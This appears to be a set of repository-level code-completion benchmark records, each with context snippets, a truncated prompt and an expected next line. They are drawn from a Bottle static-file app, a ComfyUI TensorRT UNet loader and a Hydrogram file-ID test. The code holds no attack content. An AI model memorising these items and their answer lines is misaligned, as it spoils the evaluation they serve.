yieldroutes(callback):\n for verb in makelist(method):\n verb = verb.upper()\n route = Route(self, rule, verb, callback, name=name,\n plugins=plugins, skiplist=skiplist, **config)\n self.add_route(route)\n return callback\n return decorator(callback) if callback else decorator"
},
{
"identifier": "run",
"path": "bottle.py",
"snippet": "def run(self, **kwargs):\n ''' Calls :func:`run` with the same parameters. '''\n run(self, **kwargs)"
},
{
"identifier": "template",
"path": "bottle.py",
"snippet": "def template(*args, **kwargs):\n '''\n Get a rendered template as a string iterator.\n You can use a name, a filename or a template string as first parameter.\n Template rendering arguments can be passed as dictionaries\n or directly (as keyword arguments).\n '''\n tpl = args[0] if args else None\n adapter = kwargs.pop('template_adapter', SimpleTemplate)\n lookup = kwargs.pop('template_lookup', TEMPLATE_PATH)\n tplid = (id(lookup), tpl)\n if tplid not in TEMPLATES or DEBUG:\n settings = kwargs.pop('template_settings', {})\n if isinstance(tpl, adapter):\n TEMPLATES[tplid] = tpl\n if settings: TEMPLATES[tplid].prepare(**settings)\n elif \"\\n\" in tpl or \"{\" in tpl or \"%\" in tpl or '$' in tpl:\n TEMPLATES[tplid] = adapter(source=tpl, lookup=lookup, **settings)\n else:\n TEMPLATES[tplid] = adapter(name=tpl, lookup=lookup, **settings)\n if not TEMPLATES[tplid]:\n abort(500, 'Template (%s) not found' % tpl)\n for dictarg in args[1:]: kwargs.update(dictarg)\n return TEMPLATES[tplid].render(kwargs)"
},
{
"identifier": "static_file",
"path": "bottle.py",
"snippet": "def static_file(filename, root, mimetype='auto', download=False, charset='UTF-8'):\n \"\"\" Open a file in a safe way and return :exc:`HTTPResponse` with status\n code 200, 305, 403 or 404. The ``Content-Type``, ``Content-Encoding``,\n ``Content-Length`` and ``Last-Modified`` headers are set if possible.\n Special support for ``If-Modified-Since``, ``Range`` and ``HEAD``\n requests.\n\n :param filename: Name or path of the file to send.\n :param root: Root path for file lookups. Should be an absolute directory\n path.\n :param mimetype: Defines the content-type header (default: guess from\n file extension)\n :param download: If True, ask the browser to open a `Save as...` dialog\n instead of opening the file with the associated program. You can\n specify a custom filename as a string. If not specified, the\n original filename is used (default: False).\n :param charset: The charset to use for files with a ``text/*``\n mime-type. (default: UTF-8)\n \"\"\"\n\n root = os.path.abspath(root) + os.sep\n filename = os.path.abspath(os.path.join(root, filename.strip('/\\\\')))\n headers = dict()\n\n if not filename.startswith(root):\n return HTTPError(403, \"Access denied.\")\n if not os.path.exists(filename) or not os.path.isfile(filename):\n return HTTPError(404, \"File does not exist.\")\n if not os.access(filename, os.R_OK):\n return HTTPError(403, \"You do not have permission to access this file.\")\n\n if mimetype == 'auto':\n mimetype, encoding = mimetypes.guess_type(filename)\n if encoding: headers['Content-Encoding'] = encoding\n\n if mimetype:\n if mimetype[:5] == 'text/' and charset and 'charset' not in mimetype:\n mimetype += '; charset=%s' % charset\n headers['Content-Type'] = mimetype\n\n if download:\n download = os.path.basename(filename if download == True else download)\n headers['Content-Disposition'] = 'attachment; filename=\"%s\"' % download\n\n stats = os.stat(filename)\n headers['Content-Length'] = clen = stats.st_size\n lm = time.strftime(\"%a, %d %b %Y %H:%M:%S GMT\", time.gmtime(stats.st_mtime))\n headers['Last-Modified'] = lm\n\n ims = request.environ.get('HTTP_IF_MODIFIED_SINCE')\n if ims:\n ims = parse_date(ims.split(\";\")[0].strip())\n if ims is not None and ims >= int(stats.st_mtime):\n headers['Date'] = time.strftime(\"%a, %d %b %Y %H:%M:%S GMT\", time.gmtime())\n return HTTPResponse(status=304, **headers)\n\n body = '' if request.method == 'HEAD' else open(filename, 'rb')\n\n headers[\"Accept-Ranges\"] = \"bytes\"\n ranges = request.environ.get('HTTP_RANGE')\n if 'HTTP_RANGE' in request.environ:\n ranges = list(parse_range_header(request.environ['HTTP_RANGE'], clen))\n if not ranges:\n return HTTPError(416, \"Requested Range Not Satisfiable\")\n offset, end = ranges[0]\n headers[\"Content-Range\"] = \"bytes %d-%d/%d\" % (offset, end-1, clen)\n headers[\"Content-Length\"] = str(end-offset)\n if body: body = _file_iter_range(body, offset, end-offset)\n return HTTPResponse(body, status=206, **headers)\n return HTTPResponse(body, **headers)"
}
] | from bottle import route, run, template, static_file | 1,739 |
@route("/")
def index():
    return template("index.html")
@route("/static/<filename:path>")
def static(filename):
|
@route("/")
def index():
    return template("index.html")
@route("/static/<filename:path>")
def static(filename): | return static_file(filename, root="static") | 3 | 2023-10-29 12:19:46+00:00 | 4k |
phineas-pta/comfy-trt-test | comfy_trt/node_unet.py | [
{
"identifier": "TRT_MODEL_DIR",
"path": "comfy_trt/model_manager.py",
"snippet": "BASE_PATH = os.path.dirname(os.path.realpath(__file__))\nONNX_MODEL_DIR = os.path.join(BASE_PATH, \"Unet-onnx\")\nTRT_MODEL_DIR = os.path.join(BASE_PATH, \"Unet-trt\")\nMODEL_FILE = os.path.join(TRT_MODEL_DIR, \"model.json\")\ndef get_cc() -> tuple[int]:\n\tdef __init__(self, model_file: str = MODEL_FILE):\n\tdef get_onnx_path(model_name: str) -> tuple[str]:\n\tdef get_trt_path(self, model_name: str, profile: dict, static_shape: bool) -> tuple[str]:\n\tdef get_weights_map_path(self, model_name: str):\n\tdef update(self) -> None:\n\tdef add_entry(\n\t\tself,\n\t\tmodel_name: str,\n\t\tprofile: dict,\n\t\tstatic_shapes: bool,\n\t\tfp32: bool,\n\t\tbaseline_model: str,\n\t\tprediction_type: str,\n\t\tinpaint: bool,\n\t\trefit: bool,\n\t\tunet_hidden_dim: int,\n\t\tlora: bool\n\t) -> None:\n\tdef add_lora_entry(\n\t\tself,\n\t\tbase_model: str,\n\t\tlora_name: str,\n\t\ttrt_lora_path: str,\n\t\tfp32: bool,\n\t\tbaseline_model: str,\n\t\tprediction_type: str,\n\t\tinpaint: bool,\n\t\tunet_hidden_dim: int\n\t) -> None:\n\tdef write_json(self) -> None:\n\tdef read_json(self, encode_config: bool = True) -> dict:\n\tdef available_models(self) -> dict:\n\tdef available_loras(self):\n\tdef get_timing_cache(self) -> str:\n\tdef get_valid_models_from_dict(self, base_model: str, feed_dict: dict) -> tuple[list[bool], list[float]]:\n\tdef get_valid_models(self, base_model: str, width: int, height: int, batch_size: int, max_embedding: int) -> tuple[list[bool], list[float]]:\nclass ModelManager:"
},
{
"identifier": "Engine",
"path": "comfy_trt/utilities.py",
"snippet": "class Engine:\n\tdef __init__(self, engine_path: str):\n\t\tself.engine_path = engine_path\n\t\tself.engine: trt.tensorrt.ICudaEngine = None\n\t\tself.context: trt.tensorrt.IExecutionContext = None\n\t\tself.buffers = OrderedDict()\n\t\tself.tensors = OrderedDict()\n\n\tdef __del__(self):\n\t\tdel self.engine\n\t\tdel self.context\n\t\tdel self.buffers\n\t\tdel self.tensors\n\n\tdef reset(self, engine_path=None) -> None:\n\t\tdel self.engine\n\t\tdel self.context\n\t\tdel self.buffers\n\t\tdel self.tensors\n\t\tself.engine_path = engine_path\n\t\tself.buffers = OrderedDict()\n\t\tself.tensors = OrderedDict()\n\t\tself.inputs = {}\n\t\tself.outputs = {}\n\n\tdef refit_from_dict(self, refit_weights: dict, is_fp16: bool) -> None:\n\t\t# Initialize refitter\n\t\trefitter = trt.Refitter(self.engine, TRT_LOGGER)\n\n\t\trefitted_weights = set()\n\t\t# iterate through all tensorrt refittable weights\n\t\tfor trt_weight_name in refitter.get_all_weights():\n\t\t\tif trt_weight_name not in refit_weights:\n\t\t\t\tcontinue\n\n\t\t\t# get weight from state dict\n\t\t\ttrt_datatype = trt.DataType.FLOAT\n\t\t\tif is_fp16:\n\t\t\t\trefit_weights[trt_weight_name] = refit_weights[trt_weight_name].half()\n\t\t\t\ttrt_datatype = trt.DataType.HALF\n\n\t\t\t# trt.Weight and trt.TensorLocation\n\t\t\trefit_weights[trt_weight_name] = refit_weights[trt_weight_name].cpu()\n\t\t\ttrt_wt_tensor = trt.Weights(\n\t\t\t\ttrt_datatype,\n\t\t\t\trefit_weights[trt_weight_name].data_ptr(),\n\t\t\t\ttorch.numel(refit_weights[trt_weight_name]),\n\t\t\t)\n\n\t\t\t# apply refit\n\t\t\trefitter.set_named_weights(trt_weight_name, trt_wt_tensor)\n\t\t\trefitted_weights.add(trt_weight_name)\n\n\t\t# assert set(refitted_weights) == set(refit_weights.keys()) # TODO: find out why\n\t\tif not refitter.refit_cuda_engine():\n\t\t\tprint(\"Error: failed to refit new weights.\")\n\t\t\texit(0)\n\n\tdef build(\n\t\tself,\n\t\tonnx_path: str,\n\t\tfp16: bool,\n\t\tinput_profile: list[dict] | None = None,\n\t\tenable_refit: bool = False,\n\t\tenable_all_tactics: bool = False,\n\t\ttiming_cache: str | None = None,\n\t\tupdate_output_names: str | None = None,\n\t) -> int:\n\t\tprint(f\"Building TensorRT engine for {onnx_path}: {self.engine_path}\")\n\t\tif input_profile is None:\n\t\t\tp = [Profile()]\n\t\telse:\n\t\t\tp = []\n\t\t\tfor i_p in input_profile:\n\t\t\t\t_p = Profile()\n\t\t\t\tfor name, dims in i_p.items():\n\t\t\t\t\tassert len(dims) == 3\n\t\t\t\t\t_p.add(name, min=dims[0], opt=dims[1], max=dims[2])\n\t\t\t\tp.append(_p)\n\n\t\tconfig_kwargs = {}\n\t\tif not enable_all_tactics:\n\t\t\tconfig_kwargs[\"tactic_sources\"] = []\n\n\t\tnetwork = network_from_onnx_path(onnx_path, flags=[trt.OnnxParserFlag.NATIVE_INSTANCENORM])\n\t\tif update_output_names:\n\t\t\tprint(f\"Updating network outputs to {update_output_names}\")\n\t\t\tnetwork = ModifyNetworkOutputs(network, update_output_names)\n\n\t\tbuilder = network[0]\n\t\tconfig = builder.create_builder_config()\n\t\t# config.progress_monitor = TQDMProgressMonitor() # need tensorrt v9\n\t\tif fp16: config.set_flag(trt.BuilderFlag.FP16)\n\t\tif enable_refit: config.set_flag(trt.BuilderFlag.REFIT)\n\n\t\tcache = None\n\t\ttry:\n\t\t\twith polyutil.LockFile(timing_cache):\n\t\t\t\ttiming_cache_data = polyutil.load_file(timing_cache, description=\"tactic timing cache\")\n\t\t\t\tcache = config.create_timing_cache(timing_cache_data)\n\t\texcept FileNotFoundError:\n\t\t\tlogging.warning(f\"Timing cache file {timing_cache} not found, falling back to empty timing cache.\")\n\t\tif 
cache is not None:\n\t\t\tconfig.set_timing_cache(cache, ignore_mismatch=True)\n\n\t\tprofiles = copy.deepcopy(p)\n\t\tfor profile in profiles:\n\t\t\t# Last profile is used for set_calibration_profile.\n\t\t\tcalib_profile = profile.fill_defaults(network[1]).to_trt(builder, network[1])\n\t\t\tconfig.add_optimization_profile(calib_profile)\n\n\t\ttry:\n\t\t\tengine = engine_from_network(network, config, save_timing_cache=timing_cache)\n\t\texcept Exception as e:\n\t\t\tlogging.error(f\"Failed to build engine: {e}\")\n\t\t\treturn 1\n\t\ttry:\n\t\t\tsave_engine(engine, path=self.engine_path)\n\t\texcept Exception as e:\n\t\t\tlogging.error(f\"Failed to save engine: {e}\")\n\t\t\treturn 1\n\t\treturn 0\n\n\tdef load(self) -> None:\n\t\tprint(f\"Loading TensorRT engine: {self.engine_path}\")\n\t\tself.engine = engine_from_bytes(bytes_from_path(self.engine_path))\n\n\tdef activate(self, reuse_device_memory: bool = False) -> None:\n\t\tself.context = (\n\t\t\tself.engine.create_execution_context_without_device_memory()\n\t\t\tif reuse_device_memory\n\t\t\telse self.engine.create_execution_context()\n\t\t)\n\n\tdef allocate_buffers(self, shape_dict: dict = None, device: str = \"cuda\") -> None:\n\t\tnvtx.range_push(\"allocate_buffers\")\n\t\tfor idx in range(self.engine.num_io_tensors):\n\t\t\tbinding = self.engine[idx]\n\t\t\tif shape_dict and binding in shape_dict:\n\t\t\t\tshape = shape_dict[binding].shape\n\t\t\telse:\n\t\t\t\tshape = self.context.get_binding_shape(idx)\n\t\t\tdtype = trt.nptype(self.engine.get_binding_dtype(binding))\n\t\t\tif self.engine.binding_is_input(binding):\n\t\t\t\tself.context.set_binding_shape(idx, shape)\n\t\t\ttensor = torch.empty(tuple(shape), dtype=numpy_to_torch_dtype_dict[dtype]).to(device=device)\n\t\t\tself.tensors[binding] = tensor\n\t\tnvtx.range_pop()\n\n\tdef infer(self, feed_dict: dict, stream: int) -> OrderedDict[str, torch.Tensor]:\n\t\tnvtx.range_push(\"set_tensors\")\n\t\tfor name, buf in feed_dict.items():\n\t\t\tself.tensors[name].copy_(buf)\n\t\tfor name, tensor in self.tensors.items():\n\t\t\tself.context.set_tensor_address(name, tensor.data_ptr())\n\t\tnvtx.range_pop()\n\t\tnvtx.range_push(\"execute\")\n\t\tnoerror = self.context.execute_async_v3(stream)\n\t\tif not noerror:\n\t\t\traise ValueError(\"ERROR: inference failed.\")\n\t\tnvtx.range_pop()\n\t\treturn self.tensors\n\n\tdef __str__(self):\n\t\tout = \"\"\n\t\tfor opt_profile in range(self.engine.num_optimization_profiles):\n\t\t\tout += f\"Profile {opt_profile}:\\n\"\n\t\t\tfor binding_idx in range(self.engine.num_bindings):\n\t\t\t\tname = self.engine.get_binding_name(binding_idx)\n\t\t\t\tshape = self.engine.get_profile_shape(opt_profile, name)\n\t\t\t\tout += f\"\\t{name} = {shape}\\n\"\n\t\treturn out"
}
] | import os
import torch
import comfy.supported_models as LIST_MODELS # used in eval() - do not remove
from torch.cuda import nvtx
from .model_manager import TRT_MODEL_DIR, modelmanager
from .utilities import Engine
from comfy.model_base import ModelType, model_sampling # ModelType used in eval() - do not remove
from comfy import model_management | 3,120 | # -*- coding: utf-8 -*-
# modified from https://github.com/NVIDIA/Stable-Diffusion-WebUI-TensorRT/blob/main/scripts/trt.py
# CHANGE: wrap TrtUnet to make comfy node
# STATUS: working but need clean vram to change model
# rabbit hole 0: original unet implementation
# - https://github.com/CompVis/stable-diffusion/blob/main/ldm/modules/diffusionmodules/openaimodel.py >>> UNetModel
# rabbit hole 1: a1111 unet loader
# - https://github.com/AUTOMATIC1111/stable-diffusion-webui/blob/dev/modules/sd_unet.py
# rabbit hole 2: comfy unet loader
# - https://github.com/comfyanonymous/ComfyUI/blob/master/nodes.py >>> UNETLoader
# - https://github.com/comfyanonymous/ComfyUI/blob/master/comfy/sd.py >>> load_unet
# - https://github.com/comfyanonymous/ComfyUI/blob/master/comfy/model_patcher.py
# - https://github.com/comfyanonymous/ComfyUI/blob/master/comfy/model_base.py
LIST_ENGINES = modelmanager.available_models()
class TRT_Unet_Loader:
"""ComfyUI node"""
RETURN_TYPES = ("MODEL",)
CATEGORY = "advanced/loaders"
FUNCTION = "load_trt"
@classmethod
def INPUT_TYPES(cls):
return {"required": {
"engine_file": (list(LIST_ENGINES.keys()),),
################################################# test: convert directly in GUI
# "model" : ("MODEL",),
# "batch_min": ("INT", {"default": 1, "min": 1, "max": 16}),
# "batch_opt": ("INT", {"default": 1, "min": 1, "max": 16}),
# "batch_max": ("INT", {"default": 1, "min": 1, "max": 16}),
# "height_min": ("INT", {"default": 512, "min": 256, "max": 4096, "step": 64}),
# "height_opt": ("INT", {"default": 512, "min": 256, "max": 4096, "step": 64}),
# "height_max": ("INT", {"default": 768, "min": 256, "max": 4096, "step": 64}),
# "width_min": ("INT", {"default": 512, "min": 256, "max": 4096, "step": 64}),
# "width_opt": ("INT", {"default": 512, "min": 256, "max": 4096, "step": 64}),
# "width_max": ("INT", {"default": 768, "min": 256, "max": 4096, "step": 64}),
# "token_count_min": ("INT", {"default": 75, "min": 75, "max": 750}),
# "token_count_opt": ("INT", {"default": 75, "min": 75, "max": 750}),
# "token_count_max": ("INT", {"default": 75, "min": 75, "max": 750}),
# "force_export": ("BOOLEAN", {"default": False}),
# "static_shapes": ("BOOLEAN", {"default": False}),
# "use_float32": ("BOOLEAN", {"default": False}),
}}
def load_trt(self, engine_file: str) -> tuple:
configs: list = LIST_ENGINES[engine_file]
if configs[0]["config"].lora:
model_name = configs[0]["base_model"]
| # -*- coding: utf-8 -*-
# modified from https://github.com/NVIDIA/Stable-Diffusion-WebUI-TensorRT/blob/main/scripts/trt.py
# CHANGE: wrap TrtUnet to make comfy node
# STATUS: working but need clean vram to change model
# rabbit hole 0: original unet implementation
# - https://github.com/CompVis/stable-diffusion/blob/main/ldm/modules/diffusionmodules/openaimodel.py >>> UNetModel
# rabbit hole 1: a1111 unet loader
# - https://github.com/AUTOMATIC1111/stable-diffusion-webui/blob/dev/modules/sd_unet.py
# rabbit hole 2: comfy unet loader
# - https://github.com/comfyanonymous/ComfyUI/blob/master/nodes.py >>> UNETLoader
# - https://github.com/comfyanonymous/ComfyUI/blob/master/comfy/sd.py >>> load_unet
# - https://github.com/comfyanonymous/ComfyUI/blob/master/comfy/model_patcher.py
# - https://github.com/comfyanonymous/ComfyUI/blob/master/comfy/model_base.py
LIST_ENGINES = modelmanager.available_models()
class TRT_Unet_Loader:
"""ComfyUI node"""
RETURN_TYPES = ("MODEL",)
CATEGORY = "advanced/loaders"
FUNCTION = "load_trt"
@classmethod
def INPUT_TYPES(cls):
return {"required": {
"engine_file": (list(LIST_ENGINES.keys()),),
################################################# test: convert directly in GUI
# "model" : ("MODEL",),
# "batch_min": ("INT", {"default": 1, "min": 1, "max": 16}),
# "batch_opt": ("INT", {"default": 1, "min": 1, "max": 16}),
# "batch_max": ("INT", {"default": 1, "min": 1, "max": 16}),
# "height_min": ("INT", {"default": 512, "min": 256, "max": 4096, "step": 64}),
# "height_opt": ("INT", {"default": 512, "min": 256, "max": 4096, "step": 64}),
# "height_max": ("INT", {"default": 768, "min": 256, "max": 4096, "step": 64}),
# "width_min": ("INT", {"default": 512, "min": 256, "max": 4096, "step": 64}),
# "width_opt": ("INT", {"default": 512, "min": 256, "max": 4096, "step": 64}),
# "width_max": ("INT", {"default": 768, "min": 256, "max": 4096, "step": 64}),
# "token_count_min": ("INT", {"default": 75, "min": 75, "max": 750}),
# "token_count_opt": ("INT", {"default": 75, "min": 75, "max": 750}),
# "token_count_max": ("INT", {"default": 75, "min": 75, "max": 750}),
# "force_export": ("BOOLEAN", {"default": False}),
# "static_shapes": ("BOOLEAN", {"default": False}),
# "use_float32": ("BOOLEAN", {"default": False}),
}}
def load_trt(self, engine_file: str) -> tuple:
configs: list = LIST_ENGINES[engine_file]
if configs[0]["config"].lora:
model_name = configs[0]["base_model"] | lora_path = os.path.join(TRT_MODEL_DIR, configs[0]["filepath"]) | 0 | 2023-10-25 23:58:12+00:00 | 4k |
hydrogram/hydrogram | tests/test_file_id.py | [
{
"identifier": "FileId",
"path": "hydrogram/file_id.py",
"snippet": "class FileId:\n MAJOR = 4\n MINOR = 30\n\n def __init__(\n self,\n *,\n major: int = MAJOR,\n minor: int = MINOR,\n file_type: FileType,\n dc_id: int,\n file_reference: bytes = b\"\",\n url: Optional[str] = None,\n media_id: Optional[int] = None,\n access_hash: Optional[int] = None,\n volume_id: Optional[int] = None,\n thumbnail_source: ThumbnailSource = None,\n thumbnail_file_type: FileType = None,\n thumbnail_size: str = \"\",\n secret: Optional[int] = None,\n local_id: Optional[int] = None,\n chat_id: Optional[int] = None,\n chat_access_hash: Optional[int] = None,\n sticker_set_id: Optional[int] = None,\n sticker_set_access_hash: Optional[int] = None,\n ):\n self.major = major\n self.minor = minor\n self.file_type = file_type\n self.dc_id = dc_id\n self.file_reference = file_reference\n self.url = url\n self.media_id = media_id\n self.access_hash = access_hash\n self.volume_id = volume_id\n self.thumbnail_source = thumbnail_source\n self.thumbnail_file_type = thumbnail_file_type\n self.thumbnail_size = thumbnail_size\n self.secret = secret\n self.local_id = local_id\n self.chat_id = chat_id\n self.chat_access_hash = chat_access_hash\n self.sticker_set_id = sticker_set_id\n self.sticker_set_access_hash = sticker_set_access_hash\n\n @staticmethod\n def decode(file_id: str):\n decoded = rle_decode(b64_decode(file_id))\n\n # region read version\n # File id versioning. Major versions lower than 4 don't have a minor version\n major = decoded[-1]\n\n if major < 4:\n minor = 0\n buffer = BytesIO(decoded[:-1])\n else:\n minor = decoded[-2]\n buffer = BytesIO(decoded[:-2])\n # endregion\n\n file_type, dc_id = struct.unpack(\"<ii\", buffer.read(8))\n\n # region media type flags\n # Check for flags existence\n has_web_location = bool(file_type & WEB_LOCATION_FLAG)\n has_file_reference = bool(file_type & FILE_REFERENCE_FLAG)\n\n # Remove flags to restore the actual type id value\n file_type &= ~WEB_LOCATION_FLAG\n file_type &= ~FILE_REFERENCE_FLAG\n # endregion\n\n try:\n file_type = FileType(file_type)\n except ValueError as e:\n raise ValueError(f\"Unknown file_type {file_type} of file_id {file_id}\") from e\n\n if has_web_location:\n url = String.read(buffer)\n (access_hash,) = struct.unpack(\"<q\", buffer.read(8))\n\n return FileId(\n major=major,\n minor=minor,\n file_type=file_type,\n dc_id=dc_id,\n url=url,\n access_hash=access_hash,\n )\n\n file_reference = Bytes.read(buffer) if has_file_reference else b\"\"\n media_id, access_hash = struct.unpack(\"<qq\", buffer.read(16))\n\n if file_type in PHOTO_TYPES:\n (volume_id,) = struct.unpack(\"<q\", buffer.read(8))\n (thumbnail_source,) = (0,) if major < 4 else struct.unpack(\"<i\", buffer.read(4))\n\n try:\n thumbnail_source = ThumbnailSource(thumbnail_source)\n except ValueError as exc:\n raise ValueError(\n f\"Unknown thumbnail_source {thumbnail_source} of file_id {file_id}\"\n ) from exc\n\n if thumbnail_source == ThumbnailSource.LEGACY:\n secret, local_id = struct.unpack(\"<qi\", buffer.read(12))\n\n return FileId(\n major=major,\n minor=minor,\n file_type=file_type,\n dc_id=dc_id,\n file_reference=file_reference,\n media_id=media_id,\n access_hash=access_hash,\n volume_id=volume_id,\n thumbnail_source=thumbnail_source,\n secret=secret,\n local_id=local_id,\n )\n\n if thumbnail_source == ThumbnailSource.THUMBNAIL:\n thumbnail_file_type, thumbnail_size, local_id = struct.unpack(\n \"<iii\", buffer.read(12)\n )\n thumbnail_size = chr(thumbnail_size)\n\n return FileId(\n major=major,\n minor=minor,\n file_type=file_type,\n 
dc_id=dc_id,\n file_reference=file_reference,\n media_id=media_id,\n access_hash=access_hash,\n volume_id=volume_id,\n thumbnail_source=thumbnail_source,\n thumbnail_file_type=thumbnail_file_type,\n thumbnail_size=thumbnail_size,\n local_id=local_id,\n )\n\n if thumbnail_source in {\n ThumbnailSource.CHAT_PHOTO_SMALL,\n ThumbnailSource.CHAT_PHOTO_BIG,\n }:\n chat_id, chat_access_hash, local_id = struct.unpack(\"<qqi\", buffer.read(20))\n\n return FileId(\n major=major,\n minor=minor,\n file_type=file_type,\n dc_id=dc_id,\n file_reference=file_reference,\n media_id=media_id,\n access_hash=access_hash,\n volume_id=volume_id,\n thumbnail_source=thumbnail_source,\n chat_id=chat_id,\n chat_access_hash=chat_access_hash,\n local_id=local_id,\n )\n\n if thumbnail_source == ThumbnailSource.STICKER_SET_THUMBNAIL:\n sticker_set_id, sticker_set_access_hash, local_id = struct.unpack(\n \"<qqi\", buffer.read(20)\n )\n\n return FileId(\n major=major,\n minor=minor,\n file_type=file_type,\n dc_id=dc_id,\n file_reference=file_reference,\n media_id=media_id,\n access_hash=access_hash,\n volume_id=volume_id,\n thumbnail_source=thumbnail_source,\n sticker_set_id=sticker_set_id,\n sticker_set_access_hash=sticker_set_access_hash,\n local_id=local_id,\n )\n\n if file_type in DOCUMENT_TYPES:\n return FileId(\n major=major,\n minor=minor,\n file_type=file_type,\n dc_id=dc_id,\n file_reference=file_reference,\n media_id=media_id,\n access_hash=access_hash,\n )\n return None\n\n def encode(self, *, major: Optional[int] = None, minor: Optional[int] = None):\n major = major if major is not None else self.major\n minor = minor if minor is not None else self.minor\n\n buffer = BytesIO()\n\n file_type = self.file_type\n\n if self.url:\n file_type |= WEB_LOCATION_FLAG\n\n if self.file_reference:\n file_type |= FILE_REFERENCE_FLAG\n\n buffer.write(struct.pack(\"<ii\", file_type, self.dc_id))\n\n if self.url:\n buffer.write(String(self.url))\n\n if self.file_reference:\n buffer.write(Bytes(self.file_reference))\n\n buffer.write(struct.pack(\"<qq\", self.media_id, self.access_hash))\n\n if self.file_type in PHOTO_TYPES:\n buffer.write(struct.pack(\"<q\", self.volume_id))\n\n if major >= 4:\n buffer.write(struct.pack(\"<i\", self.thumbnail_source))\n\n if self.thumbnail_source == ThumbnailSource.LEGACY:\n buffer.write(struct.pack(\"<qi\", self.secret, self.local_id))\n elif self.thumbnail_source == ThumbnailSource.THUMBNAIL:\n buffer.write(\n struct.pack(\n \"<iii\",\n self.thumbnail_file_type,\n ord(self.thumbnail_size),\n self.local_id,\n )\n )\n elif self.thumbnail_source in {\n ThumbnailSource.CHAT_PHOTO_SMALL,\n ThumbnailSource.CHAT_PHOTO_BIG,\n }:\n buffer.write(\n struct.pack(\"<qqi\", self.chat_id, self.chat_access_hash, self.local_id)\n )\n elif self.thumbnail_source == ThumbnailSource.STICKER_SET_THUMBNAIL:\n buffer.write(\n struct.pack(\n \"<qqi\",\n self.sticker_set_id,\n self.sticker_set_access_hash,\n self.local_id,\n )\n )\n elif file_type in DOCUMENT_TYPES:\n buffer.write(struct.pack(\"<ii\", minor, major))\n\n buffer.write(struct.pack(\"<bb\", minor, major))\n\n return b64_encode(rle_encode(buffer.getvalue()))\n\n def __str__(self):\n return str({k: v for k, v in self.__dict__.items() if v is not None})"
},
{
"identifier": "FileType",
"path": "hydrogram/file_id.py",
"snippet": "class FileType(IntEnum):\n \"\"\"Known file types\"\"\"\n\n THUMBNAIL = 0\n CHAT_PHOTO = 1 # ProfilePhoto\n PHOTO = 2\n VOICE = 3 # VoiceNote\n VIDEO = 4\n DOCUMENT = 5\n ENCRYPTED = 6\n TEMP = 7\n STICKER = 8\n AUDIO = 9\n ANIMATION = 10\n ENCRYPTED_THUMBNAIL = 11\n WALLPAPER = 12\n VIDEO_NOTE = 13\n SECURE_RAW = 14\n SECURE = 15\n BACKGROUND = 16\n DOCUMENT_AS_FILE = 17"
},
{
"identifier": "FileUniqueId",
"path": "hydrogram/file_id.py",
"snippet": "class FileUniqueId:\n def __init__(\n self,\n *,\n file_unique_type: FileUniqueType,\n url: Optional[str] = None,\n media_id: Optional[int] = None,\n volume_id: Optional[int] = None,\n local_id: Optional[int] = None,\n ):\n self.file_unique_type = file_unique_type\n self.url = url\n self.media_id = media_id\n self.volume_id = volume_id\n self.local_id = local_id\n\n @staticmethod\n def decode(file_unique_id: str):\n buffer = BytesIO(rle_decode(b64_decode(file_unique_id)))\n (file_unique_type,) = struct.unpack(\"<i\", buffer.read(4))\n\n try:\n file_unique_type = FileUniqueType(file_unique_type)\n except ValueError as e:\n raise ValueError(\n f\"Unknown file_unique_type {file_unique_type} of file_unique_id {file_unique_id}\"\n ) from e\n\n if file_unique_type == FileUniqueType.WEB:\n url = String.read(buffer)\n\n return FileUniqueId(file_unique_type=file_unique_type, url=url)\n\n if file_unique_type == FileUniqueType.PHOTO:\n volume_id, local_id = struct.unpack(\"<qi\", buffer.read())\n\n return FileUniqueId(\n file_unique_type=file_unique_type,\n volume_id=volume_id,\n local_id=local_id,\n )\n\n if file_unique_type == FileUniqueType.DOCUMENT:\n (media_id,) = struct.unpack(\"<q\", buffer.read())\n\n return FileUniqueId(file_unique_type=file_unique_type, media_id=media_id)\n\n # TODO: Missing decoder for SECURE, ENCRYPTED and TEMP\n raise ValueError(\n f\"Unknown decoder for file_unique_type {file_unique_type} of file_unique_id {file_unique_id}\"\n )\n\n def encode(self):\n if self.file_unique_type == FileUniqueType.WEB:\n string = struct.pack(\"<is\", self.file_unique_type, String(self.url))\n elif self.file_unique_type == FileUniqueType.PHOTO:\n string = struct.pack(\"<iqi\", self.file_unique_type, self.volume_id, self.local_id)\n elif self.file_unique_type == FileUniqueType.DOCUMENT:\n string = struct.pack(\"<iq\", self.file_unique_type, self.media_id)\n else:\n # TODO: Missing encoder for SECURE, ENCRYPTED and TEMP\n raise ValueError(f\"Unknown encoder for file_unique_type {self.file_unique_type}\")\n\n return b64_encode(rle_encode(string))\n\n def __str__(self):\n return str({k: v for k, v in self.__dict__.items() if v is not None})"
},
{
"identifier": "FileUniqueType",
"path": "hydrogram/file_id.py",
"snippet": "class FileUniqueType(IntEnum):\n \"\"\"Known file unique types\"\"\"\n\n WEB = 0\n PHOTO = 1\n DOCUMENT = 2\n SECURE = 3\n ENCRYPTED = 4\n TEMP = 5"
}
] | import pytest
from hydrogram.file_id import FileId, FileType, FileUniqueId, FileUniqueType | 3,278 | # Hydrogram - Telegram MTProto API Client Library for Python
# Copyright (C) 2017-2023 Dan <https://github.com/delivrance>
# Copyright (C) 2023-present Hydrogram <https://hydrogram.org>
#
# This file is part of Hydrogram.
#
# Hydrogram is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Hydrogram is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Hydrogram. If not, see <http://www.gnu.org/licenses/>.
def check(file_id: str, expected_file_type: FileType):
    decoded = FileId.decode(file_id)
    assert decoded.file_type == expected_file_type
    assert decoded.encode() == file_id
| # Hydrogram - Telegram MTProto API Client Library for Python
# Copyright (C) 2017-2023 Dan <https://github.com/delivrance>
# Copyright (C) 2023-present Hydrogram <https://hydrogram.org>
#
# This file is part of Hydrogram.
#
# Hydrogram is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Hydrogram is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
